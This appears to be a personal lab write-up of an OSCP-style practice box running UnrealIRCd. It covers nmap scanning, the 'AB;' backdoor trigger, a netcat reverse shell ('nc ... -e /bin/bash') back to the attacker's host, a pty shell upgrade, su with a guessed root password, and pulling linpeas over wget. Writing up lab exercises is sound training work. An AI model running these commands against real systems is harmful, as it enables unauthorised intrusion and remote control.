Portal to my Matrix (Professional Portfolio)
Target is 192.168.54.120
connecting via openvpn
openvpn oscp.vpn
nmap -sC -sV -p- -vv 192.168.54.120
PORT STATE SERVICE REASON VERSION
6667/tcp open irc syn-ack UnrealIRCd (Admin email example@example.com)
6697/tcp open irc syn-ack UnrealIRCd
8067/tcp open irc syn-ack UnrealIRCd (Admin email example@example.com)
Service Info: Host: irc.foonet.com
IRC URL no dice
searchsploit UnrealIRCd
------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------- ---------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Exec | linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration S | windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Exe | linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | windows/dos/27407.pl
------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit -v -w linux/remote/16922.rb
[i] Unable to detect version in terms: linux/remote/16922.rb
[i] Enabling 'searchsploit --strict'
-------------------------------- --------------------------------------------
Exploit Title | URL
-------------------------------- --------------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor C | https://www.exploit-db.com/exploits/16922
So it seems I literally only need to prepend my commands with "AB;" lol
Now to test if the connection works
Checked ifconfig and I'm connected to the LAN via eth0 as 192.168.49.54
sudo tcpdump -i eth0 icmp
Now to connect to IRC
nc 192.168.54.120 6667 -vvv
While my hostname is being resolved I'll pass in a command here
AB;ping -c 1 192.168.49.54
The ping went through. Seems that even though the IRC failed to validate the command still goes through
Netcat listener time
nc -nvlp 7777
p has to be at the end
Now to send the reverse shell connection from the target
AB;nc 192.168.49.54 7777 -e /bin/bash
We're in 👍
Now trifiling through home directory I find local.txt
Contains the user flag
Shell Upgrade:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now I want root after getting inside.
Method #1 - Guess
Actually try root
su root
root
The go to root's home
cd ~
There is proof.txt
root flag obtained 🏁
Method #2 - Run tools - linpeas
https://www.kali.org/tools/peass-ng/#linpeas
Upload linpeas.sh https://linpeas.sh/
https://sushant747.gitbooks.io/total-oscp-guide/content/transfering_files.html
On Kali: python -m SimpleHTTPServer 9999
On Server: wget 192.168.49.54:9999/linpeas.sh
Guides utilized: